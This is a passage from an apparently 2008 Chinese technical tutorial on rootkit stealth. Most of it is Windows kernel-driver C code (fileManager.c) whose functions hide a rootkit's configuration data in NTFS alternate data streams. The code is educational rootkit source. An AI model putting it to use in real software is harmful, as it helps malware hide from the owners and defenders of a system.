Rootkit隐形技术入门
作者: 宇文, 出处:51CTO.com , 责任编辑: 韩博颖,
2008-03-24 09:28
在安全界,rootkit已越来越引起人们的关注,而rootkit技术的过人之处就在于它的隐形技术,本文旨在向读者打开一扇通向rootkit隐形技术的大门。
FileManager.h文件中,我们将交换数据流的位置定义为MASTER_FILE ,同时声明了两个函数GetFile 和PutFile,这两个函数会在上面的configManager.c中用过,并且在下面对配置文件实现隐形的代码中也大有可为:
| // fileManager.c // 向MASTER_FILE存放交换数据流或者从MASTER_FILE取出交换数据流时,无需路径 // 与之相反,向可见的文件系统存放交换数据流或者从可见的文件系统取出交换数据 流时,需用绝对路径 #include "ntddk.h" #include #include "fileManager.h" #include "Invisible.h" NTSTATUS GetFile( WCHAR* filename, CHAR* buffer, ULONG buffersize, PULONG fileSizePtr ) { NTSTATUS rc; WCHAR ADSName[256]; HANDLE hStream; OBJECT_ATTRIBUTES ObjectAttr; UNICODE_STRING FileName; IO_STATUS_BLOCK ioStatusBlock; CHAR string[256]; // 设置文件尺寸 *fileSizePtr = 0; // 如果不是绝对路径,从NTFS-ADS中读 if( wcschr( filename, '\\' ) == NULL ) _snwprintf( ADSName, 255, L"%s:%s", MASTER_FILE, filename ); else wcscpy( ADSName, filename ); RtlInitUnicodeString( &FileName, ADSName ); InitializeObjectAttributes( &ObjectAttr, &FileName, OBJ_CASE_INSENSITIVE, NULL, NULL); rc = ZwOpenFile( &hStream, SYNCHRONIZE | GENERIC_ALL, &ObjectAttr, &ioStatusBlock, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT ); if ( rc != STATUS_SUCCESS ) { DbgPrint( "comint16: GetFile() ZwOpenFile() failed.\n" ); _snprintf( string, 255, "comint16: rc = %0x, status = %0x\n", rc, ioStatusBlock.Status ); DbgPrint( string ); return( STATUS_UNSUCCESSFUL ); } rc = ZwReadFile( hStream, NULL, NULL, NULL, &ioStatusBlock, buffer, buffersize, NULL, NULL ); if ( rc != STATUS_SUCCESS ) { DbgPrint( "comint16: GetFile() ZwReadFile() failed.\n" ); _snprintf( string, 255, "comint16: rc = %0x, status = %0x\n", rc, ioStatusBlock.Status ); DbgPrint( string ); return( STATUS_UNSUCCESSFUL ); } //成功读取后,返回读取的字节数量 *fileSizePtr = ioStatusBlock.Information; ZwClose( hStream ); return( STATUS_SUCCESS ); } NTSTATUS PutFile( WCHAR* filename, CHAR* buffer, ULONG buffersize ) { NTSTATUS rc; WCHAR ADSName[256]; HANDLE hStream; OBJECT_ATTRIBUTES ObjectAttr; UNICODE_STRING FileName; IO_STATUS_BLOCK ioStatusBlock; CHAR string[256]; //如果不是绝对路径,交给NTFS-ADS if( wcschr( filename, '\\' ) == NULL ) _snwprintf( ADSName, 255, L"%s:%s", MASTER_FILE, filename ); else wcscpy( ADSName, filename ); RtlInitUnicodeString( &FileName, ADSName ); InitializeObjectAttributes( &ObjectAttr, &FileName, OBJ_CASE_INSENSITIVE, NULL, NULL); rc = ZwCreateFile( &hStream, SYNCHRONIZE | GENERIC_ALL, &ObjectAttr, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); if ( rc != STATUS_SUCCESS ) { DbgPrint( "comint16: PutFile() ZwCreateFile() failed.\n" ); _snprintf( string, 255, "comint16: rc = %0x, status = %0x\n", rc, ioStatusBlock.Status ); DbgPrint( string ); return( STATUS_UNSUCCESSFUL ); } rc = ZwWriteFile( hStream, NULL, NULL, NULL, &ioStatusBlock, buffer, buffersize, NULL, NULL ); if ( rc != STATUS_SUCCESS ) { DbgPrint( "comint16: PutFile() ZwWriteFile() failed.\n" ); _snprintf( string, 255, "comint16: rc = %0x, status = %0x\n", rc, ioStatusBlock.Status ); DbgPrint( string ); ZwClose( hStream ); return( STATUS_UNSUCCESSFUL ); } ZwClose( hStream ); return( STATUS_SUCCESS ); } |
- 本文关键词:
